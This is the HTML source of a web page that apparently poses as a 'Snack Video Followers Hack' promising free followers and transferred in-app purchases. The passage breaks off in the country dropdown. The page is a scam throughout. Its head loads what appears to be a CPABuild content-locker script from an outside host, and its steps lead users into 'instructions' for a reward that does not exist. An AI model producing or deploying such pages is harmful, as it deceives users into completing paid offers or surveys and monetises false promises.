<!DOCTYPE HTML>
<html>
    <head>
    <title>Snack Video Follower Hack</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">	
    <meta name="robots" CONTENT="noindex,nofollow">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
    <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous">
    </script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js" integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1" crossorigin="anonymous">
    </script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM" crossorigin="anonymous">
    </script>
    <!--
   -- 
    --ads
    --
    -->
        <script type="text/javascript"> 
            var CPABUILDSETTINGS={"it":822706,"key":"c9115"};
        </script>
        <script src="https://d13nu0oomnx5ti.cloudfront.net/31eca40.js">
        </script>
        <script> 
        window.dataLayer = window.dataLayer || []; 
        function gtag(){dataLayer.push(arguments);} gtag('js', new Date());
        gtag('config', 'UA-32208775-2');
        </script>
    </head>
    <style type="text/css">
        #Name-rb{
        text-align:center;
        background-color:#f98d00;
        color:white;
        font-size:150%;
        }
        #list, #usr{
            width:80%;
            margin:auto;
            margin-bottom:2%;
            }
        #list2{
            width:80%;
            margin:auto;margin-bottom:2%;}
        #list3
            {width:80%;margin:auto;margin-bottom:2%;}
        #place
            {text-align:center;font-size:150%;}
        #myBar-rb{
            width: 0%;
            height: 30px;
            background-color: #f98d00;
            text-align: center;
            line-height: 30px;
            color: white; margin-bottom:2%;}#GN-rb , 
        #access{
            background-color: #f98d00;
            border: 1px solid #f98d00;
            }@-moz-document url-prefix() { 
        }
        #btn_center{
            text-align:center;}
        #btn_center1{
            text-align:center;}
        #cardd-rb{border-color: #f98d00;}
        .dis{
             display:none; width:20%;}
        .diss{ display:none; width:28%;}
        #dot , #dot1{
             position:absolute; font-weight:bold;
             }
        #msg1{
             display:none;}
        #msg2{
             display:none;}
             #access1{
                 text-align:center;display:none;
                 }
    </style>
    <body>
        <br/><br/><div class="container"><div class="card bg-light mb-3" id="cardd-rb"> 
            <div class="card-header" id="Name-rb"><img src="image_search_1607412817164.png"/width="50px"><b> Snack Video Followers Hack</b></div>
             <br>	<div style="width:auto;" >	
 <center><h2><b>NO ROOT REQUIRED</b></h2></center>	 
<div style="padding:30px;">
    Steps to get Free Follower in Snack video, 	 
    <ol>
        <li>Enter your Username.</li>	 
        <li>Select your Country.</li>	 
        <li>Select the Device/Platform that you use the snack video on.</li>	 
        <li>Select any one of the in-snack app purchase you wish to be transfered to your snack video Account.</li>	 
        <li>Confirm you selection by pressing the <b>"Generate Now"</b> button.</li>	 
        <li>Follow all the instructions Carefully.</li>
    </ol>
    <b>NOTE:</b> We do not need your password and other sensitive info.</div>
</div> 
<input type="text" class="form-control" id="usr" placeholder="Username">
 <select name="country" class="form-control" id="list" >
      <option value="#">Select Country*</option> 
      <option value="Afghanistan">India</option> 
      <option value="Albania">Albania</option>
       <option value="Algeria">Algeria</option>
        <option value="American Samoa">American Samoa</option>
         <option value="Andorra">Andorra</option> 
         <option value="Angola">Angola</option> 
         <option value="Anguilla">Anguilla</option>
          <option value="Antarctica">Antarctica</option>
           <option value="Antigua and Barbuda">Antigua and Barbuda</option>
            <option value="Argentina">Argentina</option>
             <option value="Armenia">Armenia</option>
              <option value="Aruba">Aruba</option>
               <option value="Australia">Australia</option> 
               <option value="Austria">Austria</option>
                <option value="Azerbaijan">Azerbaijan</option> 
                <option value="Bahamas">Bahamas</option>
                 <option value="Bahrain">Bahrain</option> 
                 <option value="Bangladesh">Bangladesh</option>
                  <option value="Barbados">Barbados</option>
                   <option value="Belarus">Belarus</option>
                    <option value="Belgium">Belgium</option>
                     <option value="Belize">Belize</option> 
                     <option value="Benin">Benin</option>
                      <option value="Bermuda">Bermuda</option> 
                      <option value="Bhutan">Bhutan</option>
                       <option value="Bolivia">Bolivia</option>
                        <option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option> 
                        <option value="Botswana">Botswana</option> 
                        <option value="Bouvet Island">Bouvet Island</option>
                         <option value="Brazil">Brazil</option>
                          <option value="British Indian Ocean Territory">British Indian Ocean Territory</option>
                           <option value="Brunei Darussalam">Brunei Darussalam</option>
                            <option value="Bulgaria">Bulgaria</option>
                             <option value="Burkina Faso">Burkina Faso</option>
                              <option value="Burundi">Burundi</option> 
                              <option value="Cambodia">Cambodia</option>
                               <option value="Cameroon">Cameroon</option>
                                <option value="Canada">Canada</option>
                                 <option value="Cape Verde">Cape Verde</option>
                                  <option value="Cayman Islands">Cayman Islands</option>
                                    <option value="Central African Republic">Central African Republic</option>
                                     <option value="Chad">Chad</option> 
                                     <option value="Chile">Chile</option> 
                                     <option value="China">China</option>
                                      <option value="Christmas Island">Christmas Island</option>
                                       <option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
                                        <option value="Colombia">Colombia</option> 
                                        <option value="Comoros">Comoros</option> 
                                        <option value="Congo">Congo</option>
                                         <option value="Congo, The Democratic Republic of The">Congo, The Democratic Republic of The</option>
                                          <option value="Cook Islands">Cook Islands</option>
                                           <option value="Costa Rica">Costa Rica</option>
                                            <option value="Cote D'i
